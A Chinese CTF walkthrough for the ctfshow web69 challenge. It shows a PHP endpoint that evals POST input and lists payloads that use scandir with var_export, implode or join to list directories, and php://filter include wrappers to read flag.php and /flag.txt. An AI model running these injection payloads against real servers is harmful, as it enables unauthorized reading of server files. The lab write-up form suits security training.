[ctfshow web入门] web69

信息收集

使用c=include("php://filter/convert.base64-encode/resource=index.php");读取的index.php

php 复制代码
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

解题

查目录

百度了一下有哪些打印函数,var_export能用

  • var_export() 函数输出或返回有关变量的结构化信息。
    该函数的工作方式与 var_dump() 类似,不同之处在于该函数的返回值是有效的 PHP 代码。
php 复制代码
c=var_export(scandir('.'));

或者换一个思路,用一个函数把array 转成字符串 ,因为我发现printecho没被禁用

php 复制代码
c=echo(implode(', ', scandir('.')));
c=print(join(', ', scandir('.')));

implode(separator,array):implode函数返回一个由数组元素组合成的字符串。

join(separator,array):join函数是implode函数的别名。


读文件

flag不在flag.php,和之前一样,不是本篇重点,不再截图

php 复制代码
c=include("php://filter/convert.iconv.utf8.utf16/resource=flag.php");
c=include("php://filter/convert.base64-encode/resource=flag.php");
php 复制代码
c=var_export(scandir('/'));
c=echo(implode(', ', scandir('/')));
c=print(join(', ', scandir('/')));
php 复制代码
c=include("php://filter/convert.iconv.utf8.utf16/resource=/flag.txt");
c=include("php://filter/convert.base64-encode/resource=/flag.txt");
c=include("/flag.txt");

web68    目录    web70

相关推荐
wuhen_n15 分钟前
JavaScript内存管理与执行上下文
前端·javascript
Yff_world23 分钟前
网络通信模型
学习·网络安全
Hi_kenyon36 分钟前
理解vue中的ref
前端·javascript·vue.js
Palpitate_LL1 小时前
Mongoose 搜索注入漏洞 CVE-2024-53900 到 CVE-2025-23061
网络安全
vortex51 小时前
动态漏洞探测:带参 URL 收集与扫描流程优化
web安全·网络安全·渗透测试
合才科技2 小时前
【要闻周报】网络安全与数据合规 2-1
安全·web安全
落霞的思绪2 小时前
配置React和React-dom为CDN引入
前端·react.js·前端框架
Hacker_Z&Q2 小时前
CSS 笔记2 (属性)
前端·css·笔记
Anastasiozzzz2 小时前
LeetCode Hot100 295. 数据流的中位数 MedianFinder
java·服务器·前端
Exquisite.3 小时前
Nginx
服务器·前端·nginx